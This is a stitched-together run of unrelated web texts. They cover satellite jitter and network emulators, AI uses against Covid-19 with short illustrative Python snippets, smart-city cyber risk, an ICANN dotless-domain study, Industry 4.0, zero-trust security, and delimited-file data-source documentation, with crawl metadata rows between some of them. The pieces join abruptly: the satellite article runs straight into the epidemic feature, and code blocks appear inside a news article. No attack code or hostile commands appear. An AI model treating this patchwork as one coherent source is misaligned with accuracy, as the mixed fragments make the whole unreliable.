● In older designs, where satellites had large footprints, you would again have to wait for your turn (slot) before data was transmitted to you
● In systems like Iridium, a LEO satellite constellation, jitter will be highly variable – though base latency is relatively low – because the satellites are in constant motion. Packets go up to the nearest convenient satellite (in range) and then pass through the satellite constellation’s mesh before landing at the receiving terminal.
To an extent, these GEO transmission issues are mitigated by spot beams in modern GEO satcom systems: instead of transmitting the same signal to one whole large area, the satellite divides its coverage into many focused spots, each of which can carry separate transmissions and so is not waiting on all the others.
This jitter is most prevalent in older GEO satellite designs that were conceived for broadcast communications (often TV) rather than unicast (point to point). Now that TV users want to watch “on-demand”, these are being replaced by more modern satellites.
So again, should we care about Jitter?
● To TCP-based applications – http, https, cifs (NetBIOS), ftp, buffered video, buffered audio etc. mean (average) latency (as well as bandwidth and loss – discussed further in part 3) is the dominant characteristic – jitter simply affects the mean latency, but as a separate effect can be ignored
● To UDP-based applications which are real time, it really does matter:
-Control systems will not work properly
-Humans have trouble with delays in live video and voice calls and video conferencing
-Telemetry may be out of date
In other words, the effect depends on the application.
How can you test your applications with satellite jitter (and latency, errors, bandwidth limitation)?
[If you read Part 1 then you can skip to “The End” – the arguments are similar and you can “also” simulate jitter. If you didn’t, please read on…]
You need to test!
That may not be as formal as it sounds: we could say you need to try the application in the satellite network.
There are issues with testing or trying using actual (real) satellite networks though:
● Satellite time is expensive and the equipment is not at all easy to deploy
● It will be just about impossible to mimic your or your customers’ real locations
● If you find an issue which needs attention, getting it to the developers for a solution will be difficult (and if the developers say they’ve sorted it out it is likely to be very difficult to retest)
● You won’t be able to try out other satellite environments e.g. MEO or LEO without purchasing them
● You won’t be able to have a rainstorm appear just when you need it during your testing
Using Satellite Network Emulators
People think of anything with the name “emulator” in it as some sort of complex mathematical device which predicts behaviours. They may be complex, but only internally. Externally we make them very straightforward. And, they don’t predict behaviour, you get to actually try out (“test”) your application using your real clients and servers just as though they were in the satellite network.
All you need to do is plug them in between a client device and the servers and set them for the satellite situation you want. You can even try out other options like LEO or MEO within seconds.
Plugging them in is easy because they have Ethernet ports, you don’t need any satellite equipment at all.
Part 3 concentrates on Errors, Loss, the effect of atmospheric conditions and choice of wavebands. It will follow soon.
If you missed Part 1, it’s already posted and looks at latency.
In the fight against epidemics, including the current Covid-19 coronavirus, medical staff are on the front line, risking their own lives to save the lives of others. But behind the lines the war is fought – or should be fought – by authorities, medical researchers, statisticians and computer scientists using an array of artificial intelligence (AI) and data science technologies.
The SARS-CoV2 or Covid-19 virus, which surpassed 500,000 confirmed cases and 23,000 deaths within three months of first detection (WHO statistics), appears to have taken most national governments by surprise – but it shouldn’t have.
Since 2000, there has been warning after warning: SARS (SARS-CoV) in 2003, H1N1 “swine flu” influenza in 2009, MERS (MERS-CoV) in 2012, West African Ebola in 2014, Zika in 2015, and numerous re-emergences of diseases such as cholera, dengue, yellow fever and, even, plague.
Global leaders have ignored repeated warnings from experts and organisations, such as Dennis Carroll (in the early 2000s) and Bill Gates. The head of the World Health Organisation (WHO), Tedros Ghebreyesus, warned in 2018: “A devastating epidemic can start in any country at any time, and kill millions of people, because we are not prepared.”
Artificial intelligence can help governments prepare their readiness for the next epidemic with computer modelling and simulations in the same way AI helps prepare nations for war through AI for military simulation and AI for military readiness.
In a 2015 TED Talk titled The next outbreak? We’re not ready, Bill Gates used computer models to predict that a pathogen as virulent as the 1918 Spanish flu would kill 33 million people worldwide in just nine months. Gates laments that governments regularly conduct war simulations to test their preparedness, “war games”, but not pandemic simulations, “germ games”.
The international community has belatedly started assessing countries’ readiness for coping with pandemics. The first Global health security index was published in October 2019. Data collection was largely manual, with researchers asking yes or no questions. Countries were scored between zero and 100, with higher scores denoting better preparedness. The US came top, with a score of 83.5, and the UK second, scoring 77.9. Retrospective evaluation of each country’s readiness for Covid-19 will highlight if pandemic readiness testing needs to be more sophisticated than this in the future.
In the past 50 years, more than 1,500 new pathogens have been discovered, 70% of which have proved to be of animal origin, according to WHO (2018) statistics. Virus or bacterial infections that “spillover” from animals to humans are called “zoonotic”. Spillover might occur when an infected animal is eaten, trafficked, farmed or bites a human, and where human activity encroaches on or destroys habitats.
Artificial intelligence can help predict the conditions and locations where spillovers of known and unknown pathogens might occur. This allows governments and agencies to plan ahead and ban or educate against high-risk activities.
The leading force in identifying zoonotic threats was Predict, set up by Dennis Carroll in 2009. It estimated that there are 1.6 million unknown viral species in animals, of which 700,000 could infect humans. Predict’s funding was withdrawn by the US government in October 2019.
Prompted by the emergence of the Zika virus in 2015, Predict started developing machine learning to help predict possible hosts for emerging Flavivirus (the family containing Zika, dengue and yellow fever), says Pranav Pandit, a researcher at the One Health Institute based at University of California School, who helped develop the tools for Predict.
Spillover is very rare, stresses Kate Jones, professor of ecology and biodiversity at UCL. It takes a unique cocktail of bad luck for a human to interact with a particular animal that is contagious with a virus that is capable of infecting a human and being passed human to human.
This is what makes AI useful for predicting what, when, why and where these rare events might occur.
Jones’s team has built machine learning models to predict where animals pinpointed as likely carriers of Ebola are likely to exist, where human behaviour, such as deforestation, brings animals and humans into dangerous proximity, and where population density and mobility risks greater spread. Jones is also experimenting with AI-enabled sensors and cameras that can detect the presence of animals – including potential hosts or “reservoirs” of zoonotic diseases – in close proximity to humans.
The first stage of outbreak analytics is detection. Quick detection is crucial because it enables early intervention – including patient isolation, contact tracing, treatment and vaccination (if available) – and the delivery of local and global alerts to prevent spread.
In a perfect world of ubiquitous, connected, affordable global healthcare – as advocated by the WHO – an infected person quickly receives medical attention and details of the illness are shared into a global, AI-enabled data system that can provide advice, summon assistance and issue warnings in real time.
The handling of the outbreak of SARS-CoV2 in Wuhan in December 2019 was a long way off this scenario. Chinese authorities – despite their developed health system – were too slow to detect, recognise or publicise the threat.
Despite the secrecy, news of the new pathogen emerged. Several AI systems picked up on internet chatter about a cluster of unidentified pneumonia cases in Wuhan and issued alerts even while the Chinese authorities stayed silent. Dataminr claims to have been first to issue an alert (only to its clients) on 30 December 2019, having picked up chatter on social media, including an image of deep cleaning taking place at the now-notorious Wuhan market. Other paid-for services such as BlueDot and Metabiota also claim that their natural language processing (NLP) algorithms were quick to pick up on the news, according to reports.
The first public alerts were also issued on 30 December, according to Associated Press. First was an automated alert from HealthMap, based at Boston Children’s Hospital, which mines numerous feeds for information. The other was a more considered alert issued by ProMED, after New York epidemiologist Marjorie Pollack had been notified by talk of the “unexplained pneumonia” cases via old-school email from China.
Healthmap and BlueDot helped to predict the spread of the virus internationally by mining data of flights leaving Wuhan during the crucial period after outbreak and before travel restrictions were brought in.
A great deal of focus has been given to forecasts of spread, rates of infection, incubation, recovery and death, and peaks and decline of the Covid-19 coronavirus. Notably, predictions by the team at Imperial College, London, are credited for rapidly changing the UK government’s strategy from “wait and see” to introducing intervention, such as social distancing. These models have traditionally been mathematical and do not tend to use AI.
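The traditional mathematical models referred to here are typically compartmental, e.g. the classic SIR (Susceptible–Infected–Recovered) model. A minimal sketch with illustrative, unfitted parameters (not Imperial College's model, and not calibrated to Covid-19):

```python
def sir(population, infected0, beta, gamma, days, dt=0.1):
    """Euler integration of the classic SIR compartmental model.

    beta – transmission rate, gamma – recovery rate; the values used
    below are illustrative only.
    """
    s, i, r = population - infected0, infected0, 0.0
    peak = i
    for _ in range(int(days / dt)):
        new_inf = beta * s * i / population * dt
        new_rec = gamma * i * dt
        s -= new_inf
        i += new_inf - new_rec
        r += new_rec
        peak = max(peak, i)
    return s, i, r, peak

s, i, r, peak = sir(population=1_000_000, infected0=10,
                    beta=0.30, gamma=0.10, days=365)
print(f"peak infections: {peak:,.0f}")
```

Changing beta is how such models express interventions like social distancing, which is why the timing of interventions matters so much to the forecast.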
However, researchers from Fudan University in Shanghai have used the Covid-19 outbreak in China as a case study to test and show that AI makes better real-time transmission predictions than traditional epidemiological forecasting models. Their first study used a stacked auto-encoder to model the transmission dynamics of the epidemic in China. A second paper used AI to predict the consequences, for the spread of the virus, of governments delaying interventions.
The SARS-CoV2 genome was sequenced rapidly by Chinese researchers and published in draft on 10 January 2020. The SARS-CoV2 genome has been sequenced innumerable times since from samples around the world.
Deep learning is used in genomic sequencing and diagnostic testing, to process large datasets and to spot variations in the code, as outlined in this November 2019 research paper, but it isn’t clear how extensively AI was used in sequencing the SARS-CoV2 genome.
There are many reasons why fast genome sequencing is important. The first is that most tests for the SARS-CoV2 virus in patients rely on identifying part of the virus genome in a nose or throat swab.
The second reason is to allow researchers – see this research paper, for example – to compare genomes, including looking for similarities with previous coronavirus pathogens such as SARS and MERS and with animal coronavirus found in suspected host species such as bats and pangolin. Also, studying the tiny mutations that occur in the virus genome every two to three weeks helps to track when and where it emerged.
Finally, the viral genome is key to tracking viral spread. Nextstrain is an open source project that analyses virus genomes from around the world, using tell-tale mutations or “phylogeny” to track the spread of the epidemic. It has collated 1,500 genomes for SARS-CoV2, producing impressive maps showing how colour-coded strains spread locally and globally. Analysis of the US shows how different strains have been criss-crossing the country.
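The core of mutation-based tracking is counting point differences between aligned genomes. A toy sketch (real pipelines such as Nextstrain align sequences first and then build a phylogenetic tree; the sequences here are made up):

```python
def mutation_distance(genome_a, genome_b):
    """Count point differences between two aligned genome strings."""
    assert len(genome_a) == len(genome_b), "sequences must be aligned"
    return sum(a != b for a, b in zip(genome_a, genome_b))

reference = "ATGGTTCACGA"
sample_1 = "ATGGTTCACGA"   # identical to the reference
sample_2 = "ATGCTTCACGT"   # two point mutations

print(mutation_distance(reference, sample_1))  # 0
print(mutation_distance(reference, sample_2))  # 2
```

Because SARS-CoV2 accumulates a mutation roughly every two to three weeks, these small distances are enough to order samples in time and place.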
While Nextstrain looks like a poster child for AI and big data, it isn’t today, says Richard Neher, a professor at Biozentrum, University of Basel, and one of the founders of Nextstrain. “Some of the algorithms involved in genome sequencing do use AI – various neural network architectures,” he says. “But there’s none currently at our end.”
Shortages of tests – particularly in the west – have highlighted issues with genome-based testing. Two very different examples of AI-enabled testing have emerged from China.
The Chinese authorities in Beijing have introduced AI-enabled thermal-imaging cameras, developed by Megvii, in crowded places such as train stations and airports to help identify people with a high temperature. Even at a distance of more than three metres in a crowded location, with people wearing masks or hats, the system can rapidly identify the forehead and recognise if a person is giving off too much heat, then, using image recognition, flag them to an official who can then check their temperature manually. A high temperature is a symptom of Covid-19. It’s no substitute for a full test, but certainly has advantages.
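The screening step itself reduces to a threshold check over per-person temperature estimates. A toy sketch (the 37.5°C threshold and the readings are illustrative; the deployed systems pair this with face detection and a manual follow-up):

```python
def flag_fevers(readings, threshold_c=37.5):
    """Return the people whose estimated forehead temperature meets
    or exceeds the threshold, for manual re-checking."""
    return [person for person, temp in readings if temp >= threshold_c]

crowd = [("A", 36.6), ("B", 38.1), ("C", 36.9), ("D", 37.5)]
print(flag_fevers(crowd))  # ['B', 'D'] – sent for a manual check
```

The value of the camera system is in the triage: only the flagged few need a manual thermometer check, so crowds keep moving.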
At the other end of the spectrum, a deep learning model has been used to accurately identify cases of Covid-19 from CT scans of patients’ chests. In a study published in March 2020, a neural network, known as COVNet, was able to examine 4,300 CT scans and accurately distinguish between patients with Covid-19 and other community-acquired pneumonia and lung diseases.
Several Chinese companies have developed similar CT scan recognition technologies, honed in Wuhan. These include Infervision, which has recently been deployed in an Italian hospital. A Canadian startup, DarwinAI, recently made its CT scan reading technology open source.
Prior to testing and even to symptoms, there is a period when the patient is unknowingly contagious and can pass on the virus. The standard way to deal with this is through contact tracing, to establish to whom the infected person could have passed the disease and alert, test, treat and/or isolate those contacts.
Contact tracing was a big part of the containment strategy in Singapore. Once a person tests positive, Singapore interviews the infected person and attempts to track every person they have interacted with in the one to two weeks prior to testing positive. Initially, this appears to be a largely manual process, but in March 2020 the country introduced a phone app called TraceTogether (now available open source) which uses Bluetooth to log all close interactions with other app users. If one app user develops Covid-19, all at-risk individuals and the authorities can be alerted.
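The matching step behind such an app can be sketched as a look-back over proximity logs (an illustration of the idea only, not TraceTogether's actual protocol; the names and window length are assumptions):

```python
from datetime import datetime, timedelta

def exposed_contacts(logs, case_id, window_days=14, now=None):
    """Given Bluetooth proximity logs as (user_a, user_b, timestamp)
    tuples, return everyone near `case_id` within the look-back window."""
    now = now or datetime.utcnow()
    cutoff = now - timedelta(days=window_days)
    contacts = set()
    for a, b, ts in logs:
        if ts >= cutoff and case_id in (a, b):
            contacts.add(b if a == case_id else a)
    contacts.discard(case_id)
    return contacts

now = datetime(2020, 3, 30)
logs = [
    ("alice", "bob",   datetime(2020, 3, 25)),  # within 14 days
    ("carol", "alice", datetime(2020, 3, 28)),  # within 14 days
    ("alice", "dave",  datetime(2020, 3, 1)),   # too old
    ("bob",   "carol", datetime(2020, 3, 29)),  # doesn't involve alice
]
print(sorted(exposed_contacts(logs, "alice", now=now)))  # ['bob', 'carol']
```

Keeping the logs on the handset and only matching after a positive test is what lets this design trace contacts without continuously tracking location.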
The extent to which Korea’s comprehensive contact tracing system uses AI is also unclear. However, this paper shows that Korea uses personal data records, including hospital and pharmacy visits, GPS data, credit card transactions and CCTV, which is allowed under special rules enacted following the MERS outbreak in 2015.
From early February 2020, China rapidly rolled out a Close Contact Detector app across the country to control Covid-19. It works on a traffic light system. At railway stations, venues, and so on, you have to scan the app or officials check the app and only allow people in if the app shows a green light. The system behind the app is shrouded in secrecy, but it appears to rely on some sophisticated AI.
An expat resident tells Computer Weekly that on returning to Shanghai Airport from abroad in February, he and his companion had to download the app. They then took a taxi home. Just 15 minutes after returning to their apartment, health officials and police knocked on the door. They took their temperatures and politely explained they must self-quarantine for two weeks and asked them to sign documents saying they understood.
“In the morning, I went to buy a coffee nearby,” he explains, not having understood the strictness of rules. “Within an hour, the police and health officials were knocking on the door again. They knew exactly where I had been from the phone.
“They didn’t fine me. They explained it was my civic duty and warned me not to do it again. I apologised and thanked them. It was a bit scary, but I fully support it and I’m happy they did it. This is how they track the virus. It works. It has helped China win the battle against Covid-19,” he adds.
Information and control of misinformation
In any disaster it is essential to get the correct information to citizens, data to organisations, and curtail fake news and scams. Bad information can kill, as demonstrated by the hundreds of people who died unnecessarily in Iran from drinking methanol, believing it to be a coronavirus cure.
AI can help provide correct information and curtail the dissemination of the bad. Google, Facebook and other search and social media giants have tweaked their algorithms and pumped up the lie detectors on their platforms in an effort to promote legitimate information and eliminate misinformation. To searches related to Covid-19, Google surfaces data from national governments and health organisations, rather than the usual popular posts and paid-for messages from advertisers.
An interesting example of many new information services is the WhatsApp Health Alert developed by Praekelt.org for South Africa and now rolled out by the WHO. It is a multi-language service using machine learning and natural language understanding to answer users’ questions and steer them to the best resources. The WHO service attracted 12 million users in the first week.
The level of data sharing by governments, agencies, hospitals, research institutions and all manner of organisations is unprecedented. This enables the building of innovative data-led services – including the king of Covid-19 stats, Worldometer – and supports the researchers who are modelling the outbreak projections, the medical researchers who are striving to devise and test new treatments, and the computer scientists who are building the AI tools that will facilitate them all.
One of the key and cutting-edge ways that AI is used in healthcare is computational drug repurposing. In this process, researchers use deep learning technologies to search through huge databases of existing drugs – such as Drugbank – many approved by the US Food and Drug Administration, to find potential remedies to new problems. The hope is that AI can be trained to find viral inhibitors – either vaccines or treatments – in the same way that researchers at MIT used deep neural networks to find a potential new antibiotic to fight bacterial infections such as E. coli.
AI can help predict if potential drugs will prevent the virus binding with human cells, if the drug is likely to be toxic to human cells, and if it could cause a dangerous interaction with other common drugs, thereby helping to pre-screen potential drugs before lab testing.
Many labs globally are working on developing AI or using AI to investigate and test potential drugs. These include the MIT lab behind the aforementioned antibiotic. There are many pre-published papers – that is, with no peer review – where researchers have claimed drug discoveries using AI such as this one from Insilico and this one from Michigan State University.
Being prepared for next time
In the years to come, analysis of the Covid-19 outbreak and national and global responses will be extensive and possibly damning. One positive thing to come from this will undoubtedly be the recognition of the role that AI plays and should play in preparedness for and dealing with global epidemics.
Read more about AI and infectious disease epidemics and pandemics
- Coronavirus: Mobilising data science.
- Coronavirus: How data visualisation could build resilience against future pandemics.
- How Asia’s tech firms are helping to stem the Covid-19 outbreak. | <urn:uuid:127e4340-e28b-47a8-ae5d-9de18ec5742d> | CC-MAIN-2022-40 | https://www.computerweekly.com/feature/Coronavirus-the-role-of-AI-in-the-war-against-epidemics-and-pandemics | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00361.warc.gz | en | 0.955258 | 3,556 | 3.109375 | 3 |
Cities must use technology to make better, more educated decisions about the future while increasing transparency and communication.
It looks like 2020 will be a year of reckoning for buzzword-bingo digital technologies. For some time, U.S. citizens have been promised that their tax dollars were being invested in artificial intelligence and machine learning platforms that would make their lives easier. After nearly a decade of broken promises, the public isn’t going along with it anymore.
In this “always-on” age, city residents are demanding more efficient digital services. They expect public agencies to act more like consumer brands and have become less tolerant of service disruptions. But with every step cities take toward digital transformation, the threat of disruptions -- from cybersecurity attacks to natural disasters -- increases.
The balancing act for cities in 2020 is to recognize all the risks of disruption caused by digitalization and continue their own digital transformation -- all while the global economy is slowing and investment is getting harder to come by. The answer lies in using technology to make better, more educated decisions about the future while increasing transparency and communication.
Threats and disruptions
With every bus line that gets electrified and every neighborhood that gets Wi-Fi, the opportunity for disruption grows. Natural disasters like wildfires and hurricanes can take out multiple services in one fell swoop. But slower trends, like population growth or a particularly rainy season that leads to heavy vegetation, can also burden systems to the point of an outage.
And then there is the human element. One misguided click could lead to a massive breach of residents’ data or to a city's 911 system being held hostage by ransomware. Since 2018, ransomware attacks have shuttered city governments from Atlanta (a successful attack by two Iranian hackers and a good example of how geo-politics can affect cities) to Baltimore to 22 towns in Texas. Some of these attacks shut down mission-critical services like the court system and law enforcement.
That costly trend is only going to grow in 2020. Lloyd's estimates that New York City could face over $2.3 billion in cyber-related losses this year. But even more concerning is the possibility of a loss of life, which hasn't happened yet but could be on the horizon.
As threats increase and the global economy slows, cities will have to narrow their priorities in 2020. With these competing demands, what is really going to move the needle for smart cities and where should they prioritize their investments?
Simulations for a smarter tomorrow
Time to value is more important than ever when it comes to smart city investment strategies. Products that help cities simulate, prepare for and mitigate future threats are key.
Cities need the ability to forecast conditions a year, five years and even further out so they can best use their resources today for a smarter tomorrow. That’s the kind of runway municipalities need to make broad changes such as fortifying the grid or developing an extensive vegetation management program. Organizing labor and capital for massive projects like those takes more than one season. Digital transformation tools, particularly the internet of things, give cities more data to make more informed decisions about the future to prevent disruption and mitigate threats.
Data must be collected from as many sources as possible, which requires more than one product. Think of it like a mosaic. Cities must mix and match solutions that analyze different data to get a full picture. Sometimes they invest in one or two, but that’s not enough to get actionable information. Statistics-based prognostic capabilities are the key driver -- that’s how to get the best holistic picture of what’s going to happen.
Cities should also invest in services and solutions with industry-specific expertise. These will provide the best understanding of the challenges and dynamics of how systems work and deliver the most accurate forecasting to drive smarter decision-making.
Communication conquers the “unknown unknown”
No matter how much data-driven simulating and forecasting is done, there is always the “unknown unknown.” So how do smart cities use digital transformation to protect themselves from blowback from the public when the inevitable, unforeseeable disruption occurs? Communication.
East Coast utilities have been fined for their handling of hurricane damage -- not because of the response time or length of outages, but because they didn’t have the level of communication that their customer base demanded. The proper use of the right digital tools would have helped, such as a text message alerting users to an updated system and/or a responsive presence on social media to answer customer questions. Talking to people on the platforms they use about the steps being taken to manage a crisis and offering the best estimates of service restoration goes a long way. Even if repairs are not happening right in front of residents, they still want to know that officials are working on it. Communication and transparency are key.
Working together to solve shared challenges
This will be the year the public’s expectations bring back an appreciation for expertise. Cities will see more threats because of their modernization efforts but will also have the opportunity to mitigate damage with digital technology.
The most important lesson is that these threats are not unique. Every city struggles to balance the pros and cons of digital transformation and faces the same natural and human threats. No city exists in a silo.
The smartest cities will band together to meet these challenges with investments and shared best practices in cybersecurity, long-term predictive simulation and transparent communication inside and outside city limits. The more open and transparent vendors, utilities, telecoms and other industries that make up the modern city infrastructure are with each other, the easier and safer all our ecosystems will be.
Making small changes to complex high availability systems can have extreme consequences. When these systems provide critical services to the entire planet – like, say, the Domain Name System – even minor changes must be analyzed very carefully.
That’s why ICANN hired us to perform a study on the security and stability implications of a proposed deployment of dotless domain names, or dotless generic Top Level Domains. Allowing dotless names would allow independent third parties to operate web sites like “http://search/” or “https://bank/”.
No dots. Seems simple, right? Our study covers the breadth and scope of the entire Domain Name System, from the technology used to the people consuming the technology.
You can view the ICANN post about the study, with a link to our report, here: http://www.icann.org/en/news/announcements/announcement-05aug13-en.htm | <urn:uuid:71e2796e-a5bd-4718-911c-5ac2b9c4f211> | CC-MAIN-2022-40 | https://carvesystems.com/news/look-ma-dotless-domain-names/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00361.warc.gz | en | 0.889682 | 196 | 2.515625 | 3 |
What Is Industry 4.0?
Industry 4.0 definition: Industry 4.0, also known as the “Fourth Industrial Revolution”, refers to the wide-scale adoption of new technologies in manufacturing—like the Internet of Things, smart machines, and automation—to improve business efficiencies.
Industry 4.0 is a term that has been used with more frequency since the early 2010s, when a German government communication used it to describe an action plan for fully automating and computerizing auto factories.
The term caught on, and now virtually everyone in manufacturing is familiar with the concept, which has since expanded to become one of the biggest drivers of technological change in the sector.
Unsurprisingly, the biggest uptake of Industry 4.0 has come from industries that have traditionally been forward-thinking in their approach to technology adoption—notably auto manufacturing; aerospace; and food and beverage.
Where Does the “4.0” Come From?
If you’re wondering why it’s the fourth, the first (and most famous) Industrial Revolution of course took place in the late 18th and early 19th centuries with the advent of steam power and machinery.
The Second was before World War I, when railroads, sewer systems, telegraph systems, and gas and water works came about, in addition to a boon from steel manufacturing.
The Third is what we more commonly call the Digital Revolution during the latter half of the last century, which saw the widespread commercialization and use of personal computers and other electronics.
And now we have the Fourth, or Industry 4.0, which has been precipitated by large-scale advances in automation and connected devices across a digitized global supply chain.
Why Does Industry 4.0 Matter?
Industry 4.0 matters because, beneath all the buzzwords and business-speak, its associated applications are beneficial to practically any manufacturing firm, from small and midsize businesses to large enterprises.
Organizations that have adopted and implemented Industry 4.0 practices into their businesses have thrived, while those that haven’t quickly find themselves as laggards, unable to keep pace with their more digitally-astute competitors.
The reasons for this are quite simple: many aspects of the technology that Industry 4.0 encompasses are beneficial and cost-effective for manufacturers, whether that means gains in productivity or efficiency, or simply reducing wasteful expenditures like unnecessary labor costs or avoidable equipment repairs.
So, let’s take a look at what all of this actually means in a practical sense—what does Industry 4.0 look like on the factory floor?
Core Aspects of Industry 4.0
Smart sensors

The humble sensor may not seem like much, but these devices, especially with the growth and expansion of smart sensors, are some of the biggest drivers for the entire industry.

Manufacturers don’t adopt technology so that they can boast about how digital they are; they do it because implementing things like smart sensors has very clear and tangible advantages that give an immediate boost to a business.
The global smart sensor market size is expected to grow from $36.6 billion in 2020 to $87.6 billion by 2025, at a CAGR of 19.0%.
Sensors are widely and increasingly used by organizations for a variety of purposes, but let’s take a look at condition monitoring as an example of their use.
A sensor that is used for the purposes of condition monitoring will report raw data instantly through a cloud system, typically an ERP, which will then analyze and report actionable data to a manager.
As the data is compiled and reported in real-time and without the need for input from a human, you can be alerted if there is an issue with a machine, which can then be scheduled for downtime and fixed before it evolves into a larger—and far more expensive—problem.
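As a sketch of that flow, the alerting described above boils down to comparing each machine's latest reading against an alarm threshold; the machine names, readings, and threshold below are illustrative assumptions, not a real monitoring API:

```python
VIBRATION_LIMIT = 7.1  # mm/s; an assumed alarm threshold

def machines_to_service(latest_readings, limit=VIBRATION_LIMIT):
    """Return machine IDs whose latest vibration reading exceeds the
    limit, so maintenance can be scheduled before a costly failure."""
    return [m for m, value in latest_readings.items() if value > limit]

readings = {"press-1": 3.2, "lathe-4": 9.8, "mill-2": 7.0}
alerts = machines_to_service(readings)
print(alerts)  # -> ['lathe-4']
```

In a real system the readings dictionary would be fed continuously by the sensors via the ERP, and the alert would trigger a scheduled downtime window.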
Analytics for your supply chain
The total amount of data in the world today is vastly larger than it was ten, five, or even one year ago.
In 2018, it was estimated that there were 18 zettabytes in the world. By 2025, this figure is expected to reach 175 zettabytes.
To place that into context, 1 zettabyte is approximately 1 trillion gigabytes.
This rapid growth of data has led to what we now call “big data”, which in business terms refers to the mountains of data that organizations have under their roofs.
Up to 73% of company data is unused by businesses
The question for businesses then is how can they best use that data to serve their customers and their organization?
And this is where supply chain analytics goes hand-in-hand with big data.
With the right solution, you can put your data to use by having an automated system crawl your data, giving you actionable results which can inform your business decisions.
The number of supply chain professionals who say they’re currently using predictive analytics at their company grew 76% from 2017 to 2019
You can use analytics to help you spot trends, such as over- or understocked warehouses, seasonal upturns or downturns, products that are performing better than others, and many other factors.
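A minimal sketch of that kind of stock analysis; the thresholds and inventory figures are made-up assumptions for illustration:

```python
def stock_outliers(stock, low=0.5, high=1.5):
    """Flag SKUs whose on-hand quantity is far from its target level.
    `stock` maps SKU -> (on_hand, target)."""
    flags = {}
    for sku, (on_hand, target) in stock.items():
        ratio = on_hand / target
        if ratio < low:
            flags[sku] = "understocked"
        elif ratio > high:
            flags[sku] = "overstocked"
    return flags

inventory = {"widget": (900, 500), "gear": (40, 200), "bolt": (510, 500)}
flags = stock_outliers(inventory)
print(flags)  # -> {'widget': 'overstocked', 'gear': 'understocked'}
```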
Automation

Automation, at least as far as manufacturing goes, is likely to conjure familiar images of robots building cars or articles predicting job losses at a high-tech plant.
The reality is that while physical, automated robots have seen a rapid increase in adoption among manufacturers—notably food and beverage manufacturers—you’re just as likely to find software robots performing tasks alongside human counterparts.
Technology like robotic process automation (RPA) has seen a sharp upward trend in adoption among SMBs, partly due to implementation costs falling compared to previous years, but mostly because of the improvement it can bring to existing business processes.
Decision makers are increasingly keen to implement RPA in their organizations, with up to 40% of larger enterprises adopting some kind of RPA software by this year, up from 10% in 2018.
We’ve already spoken about how ERPs use automation tech to report data to decision makers from sensors.
Well, the same technology can be used to serve other functions, too, whether it’s tracking freight, customer service, or administrative tasks. Work processes and functions can be streamlined through software automation.
Internet of Things
Finally, we have the Internet of Things (IoT), which serves as a central component of a successful Industry 4.0 strategy.
Industry 4.0 is defined by improving the interconnectivity of organizations, meaning, in essence, that devices, whether smart sensors, tablets, or machines, are all connected to the cloud under one network.
This allows devices to communicate and work in tandem with one another, inputting data onto the cloud and reporting back to you.
First wave IIoT adopters on average experience a 30% increase in productivity
The integration of IoT into digital platforms is creating smarter, faster, and more nimble manufacturing operations that can respond fluidly to changing conditions.

This will also support increased discrete manufacturing capabilities, that is, make-to-order production, which has historically been seen as an unsustainable business model.
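The publish-and-report loop described in this section can be sketched with an in-memory channel standing in for the cloud network; a real deployment would use a broker protocol such as MQTT, so everything below is an illustrative assumption:

```python
import queue

# Toy "cloud" channel shared by all devices on one network.
cloud = queue.Queue()

def publish(device_id, payload):
    """A device pushes a reading or event onto the shared channel."""
    cloud.put({"device": device_id, "payload": payload})

publish("sensor-7", {"temp_c": 21.5})
publish("tablet-2", {"event": "order #118 picked"})

# The dashboard side drains the channel and reports back.
messages = []
while not cloud.empty():
    messages.append(cloud.get())
print(len(messages))  # -> 2
```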
- Industry 4.0 refers to the implementation of new technology in manufacturing operations.
- Adoption among businesses, particularly SMBs, is quickly becoming one of the main distinguishing factors between successful companies and laggards.
- The core principles of Industry 4.0 are implementing automation, the use of smart devices, connectivity between devices, and the analysis which can be performed using data from those devices.
Zero-Trust (Perimeterless Security)
The Zero-Trust Security Model is built around the premise of “never trust, always verify,” which means that devices are not trusted by default, even if they are connected to your own managed network and were previously verified.
The traditional security model, which trusts devices inside a corporate perimeter (or those that connect to it via a VPN), makes little sense in today’s distributed computing environments.
Thus, the zero-trust model promotes mutual authentication and checking the identity and integrity of devices regardless of their location. It also grants access to applications and services based on device identity, device health, and user authentication.
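A zero-trust access check can be sketched as verifying all three factors on every request, with nothing trusted by default; the device registry, the health criterion, and the session names below are illustrative assumptions:

```python
# Known devices and their last reported health posture.
KNOWN_DEVICES = {
    "laptop-42": {"patched": True},
    "phone-7": {"patched": False},
}
# Sessions belonging to users who completed authentication.
ACTIVE_SESSIONS = {"session-abc"}

def authorize(device_id, session_token):
    """Never trust, always verify: device identity, device health,
    and user authentication are all checked on every request."""
    device = KNOWN_DEVICES.get(device_id)
    if device is None:          # unknown device: never trusted by default
        return False
    if not device["patched"]:   # failed health check: deny access
        return False
    return session_token in ACTIVE_SESSIONS  # user must be authenticated

print(authorize("laptop-42", "session-abc"))  # -> True
print(authorize("laptop-42", "stale"))        # -> False
print(authorize("phone-7", "session-abc"))    # -> False (unhealthy device)
```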
Delimited File Sources¶
Use the delimited file data source (DF) to extract data from plain text files like these:
Comma-separated values files (CSV files). With this data source, the delimiter can be a comma or any other character.
Files that have a more complex structure that can be represented with a regular expression (e.g. application log files).
Fixed-width files. That is, files in which the columns do not have delimiters and instead, each column has a fixed width.
To create a new DF (delimited file) data source, right-click on the Server Explorer and click New > Data source > DF
The Tool will display the dialog to create the data source.
The following data are requested:
Name. Name of the new data source.
Data route. Path to the delimited file. The formats of the available paths are described in detail in the section Path Types in Virtual DataPort. The path can be parameterized using interpolation variables (see section Paths and Other Values with Interpolation Variables).
If the selected “Data route” is Local or FTP / SFTP / FTPS Client and the route points to a directory, the base views created over this data source will retrieve the data from all the files in the directory and not just one file. The data in all the files must have the same schema.
When the route points to a directory but you only want to process some of the files in this directory, enter a regular expression that matches the names of these files in the File name pattern box. For example, if you want the base view created over a data source to return the data of all the files with the extension "log" located in the folder "C:\log_files", set the "Local path" to "C:/log_files" and the "File name pattern" to "(.*)\.log". Note that "File name pattern" is a regular expression and not a file pattern; that is why the dot is prefixed with a backslash (in a regular expression, an unescaped dot matches any character).
To retrieve data from files that use a date-based naming convention (as is usual in log files), use the ^DateRange interpolation function. See the section Paths Using Date Ranges to learn how to use this function.
Ignore route errors. If selected, the data source will ignore the errors that occur when accessing the file(s) to which the data source points.

